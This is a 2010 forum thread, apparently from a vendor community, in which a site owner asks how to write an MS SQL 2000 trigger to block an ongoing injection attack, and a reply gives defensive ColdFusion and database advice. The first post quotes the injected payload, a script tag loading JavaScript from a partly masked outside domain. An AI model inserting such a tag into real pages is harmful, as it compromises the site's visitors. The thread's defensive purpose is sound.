Skip to main content
A
Anonymous
January 27, 2010
Question

trigger in msSQL2000 tables to stop input, update with specific characters.

  • January 27, 2010
  • 1 reply
  • 623 views

client site is under severe data injection attack and have stoped by blocking all write access to the 4 tables under attack. this works ok for now but these tables need to be updated.

the injection is appx this: </title><script src='http://google-anxxxxx.info/urcxxx.js'></script>

what i want to do is in tables that have no url/email data is stop write if data contains <, >, / and maybe "script" or some other text.

if the table contains url/email data, stop entry with "</table>" or some such.

no the data is not being posted thru site search or other formsets. this is what i first thought so wrote CF to detect and block to no avail. also have perused the site for "special" page with formsets they could use. no there too. think is some very vicious bot and is coming from russia!!!

tnx in advance.

This topic has been closed for replies.

1 reply

J
JR__Bob__Dobbs-qSBHQ2
Inspiring
January 27, 2010

You need to do a couple things.

1. Update your ColdFusion code.

    a. All queries should use CFQUERYPARAM.  This is the first thing you should do.  If your database is queried based on a URL parameter it is vulnerable, forms are not the only attack vector for SQL injection attacks.

    b. Enable scriptprotect in your Application.cfc.

    c. Whitelist your input, only allow the characters appropriate for each type of data.  For example angle brackets should never be accepted from a form post as an email form field value.

    d. Consider using a 3rd party component such as Portcullis. http://portcullis.riaforge.org/

    e. Consider using a user-defined function to remove SCRIPT and other undesireable tags from your form input.  Example: http://www.cflib.org/udf/stripHTML

2. Scrub your database.


    a. You'll need to check every text column for SCRIPT tag blocks and remove them.  You should script this in a test environment before running updates on a production server.
    b. Verify that the database login used by your web application has the minimal privleges needed to read and write in the database.

3. Become educated on web security. Here are some useful sites.
    http://www.12robots.com
    Jason Dean has done a good series of blog posts on web/CF security.
   
    http://www.owasp.org        
    Open Web Application Security Project, a user based organization devoted to improving security.

    http://www.meetup.com/coldfusionmeetup/pages/Recordings_of_the_ColdFusion_Meetup/
    The online ColdFusion meetup group has some security related presentations on the site.

    http://msdn.microsoft.com/en-us/library/ms161953(SQL.90).aspx
    A Microsoft article on SQL injection.  The principals discussed here apply regardless of platform.
A
Anonymous
January 28, 2010

to all and Mr. Dobbs,

tnx for your reply but if you had read my post, you would have seen we had done some of these inc. checking data for malicious code before posting. note that one of the tables could only be written to by a formset on a page in a secure, password protected section of the site.

I know it sounds far fetched but maybe we are being the testbed for the next bot from he**. The only way to stop the writes, that by the way, had all data in a given row either overwritten or the text was added to existing text, was to block all write permissions on the table itself.

i do not have a lot of experience with this as my sites are fairly secure and pages that are called often need a token or other data from the calling page to open.

I and my hosting company have spen almost a week on this and feel that this could be a bot that maybe mines data such as table names, fields, etc. from existing pages and then writes it's own input data as the fields were either real or ntext.

as such i think the next step on my part is to try to block at the db level. i want to see if a trigger would work. i know it slows down writes but still might be the ultimate solution until a bot comes along to delete triggers. like everything on the internet, we can sometimes only just stay even with those trying to do damage.

AGAIN I ASK...

does somebody know how to write a trigger that checks incoming data BEFORE it allows an insert or update and then does an immediate end or escape if it finds indicated characters such as <, >, / and or blocks like <script>. best if trigger could check all fields at once.

tnx in advance,

andy

Terms & ConditionsAccessibility statement
Using the community Terms of use Privacy Cookie preferences Do not sell or share my personal information ad choicesAdChoices